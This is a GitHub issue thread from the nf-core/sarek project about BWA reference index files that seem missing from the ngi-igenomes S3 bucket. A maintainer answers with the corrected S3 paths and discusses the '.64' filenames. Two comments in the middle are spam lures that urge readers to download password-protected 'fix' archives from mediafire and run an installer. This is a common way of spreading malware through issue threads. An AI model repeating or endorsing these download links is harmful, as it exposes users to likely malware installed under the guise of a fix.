### ISSUE TITLE
some reference files seem to be missing

### ISSUE THREAD

**Issue by stevekm** [nf-core/sarek#1631]
### Description of the bug

Some of the files described in the `igenomes.config` file seem to no longer be present. Am I doing something wrong or were these files moved?

These all seem to be missing;

```bash
aws s3 ls s3://ngi-igenomes/Homo_sapiens/GATK/GRCh37/Sequence/BWAIndex/
aws s3 ls s3://ngi-igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAmem2Index/
aws s3 ls s3://ngi-igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAIndex/
```

I found similar files under a path like this

```bash
$ aws s3 ls s3://ngi-igenomes/igenomes/Homo_sapiens/NCBI/GRCh38/Sequence/BWAIndex/
                           PRE version0.5.x/
                           PRE version0.6.0/
2017-04-13 07:05:20 3144230986 genome.fa
2017-04-13 07:05:21      17478 genome.fa.amb
2017-04-13 07:05:21      27715 genome.fa.ann
2017-04-13 07:05:22 3099922624 genome.fa.bwt
2017-04-13 07:05:30  774980637 genome.fa.pac
2017-04-13 07:05:52 1549961320 genome.fa.sa
```

Are these the exact same files that were meant to be at those locations listed in the config file?

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FriederikeHanssen** [comment]
Hey @stevekm ,

I see these ones:

```
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh37/Sequence/BWAIndex/human_g1k_v37_decoy.fasta.amb
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh37/Sequence/BWAIndex/human_g1k_v37_decoy.fasta.ann
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh37/Sequence/BWAIndex/human_g1k_v37_decoy.fasta.bwt
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh37/Sequence/BWAIndex/human_g1k_v37_decoy.fasta.pac
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh37/Sequence/BWAIndex/human_g1k_v37_decoy.fasta.sa
```

and 

```
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAIndex/Homo_sapiens_assembly38.fasta.64.alt
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAIndex/Homo_sapiens_assembly38.fasta.64.amb
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAIndex/Homo_sapiens_assembly38.fasta.64.ann
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAIndex/Homo_sapiens_assembly38.fasta.64.bwt
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAIndex/Homo_sapiens_assembly38.fasta.64.pac
s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAIndex/Homo_sapiens_assembly38.fasta.64.sa
```
and 

```
aws s3 --no-sign-request --region eu-west-1  ls s3://ngi-igenomes/igenomes/Homo_sapiens/GATK/GRCh38/Sequence/BWAmem2Index/
2022-05-23 09:41:11 6434693834 Homo_sapiens_assembly38.fasta.0123
2022-07-06 13:15:33     487553 Homo_sapiens_assembly38.fasta.alt
2022-05-23 09:41:10      20199 Homo_sapiens_assembly38.fasta.amb
2022-05-23 09:41:10     455474 Homo_sapiens_assembly38.fasta.ann
2022-05-23 09:41:11 10456377594 Homo_sapiens_assembly38.fasta.bwt.2bit.64
2022-05-23 09:41:11  804336731 Homo_sapiens_assembly38.fasta.pac
```

Are those the files you are looking for?

**Comment by skelly02** [comment]
looks like it thanks

**Comment by stevekm** [comment]
why is the file labeled as `BWAIndex/Homo_sapiens_assembly38.fasta.64.amb` instead of `BWAIndex/Homo_sapiens_assembly38.fasta.amb`, and such? And how do we know which exact fasta file it was used with? I see `Homo_sapiens/GATK/GRCh38/Sequence/WholeGenomeFasta/Homo_sapiens_assembly38.fasta` but I want to make sure this is the exact same file used to generate the BWA indexes

**Comment by stevekm** [comment]
looks like this is an old unanswered question ; https://github.com/broadinstitute/gatk/issues/3768
do we know if these files with "64" in them still work as-is with BWA?

**Comment by FriederikeHanssen** [comment]
We have been using them in the sarek full size tests, so they work. 
This is the `bwa` index pointed to: "s3://ngi-igenomes/igenomes//Homo_sapiens/GATK/GRCh38/Sequence/BWAIndex/" for the default genome.
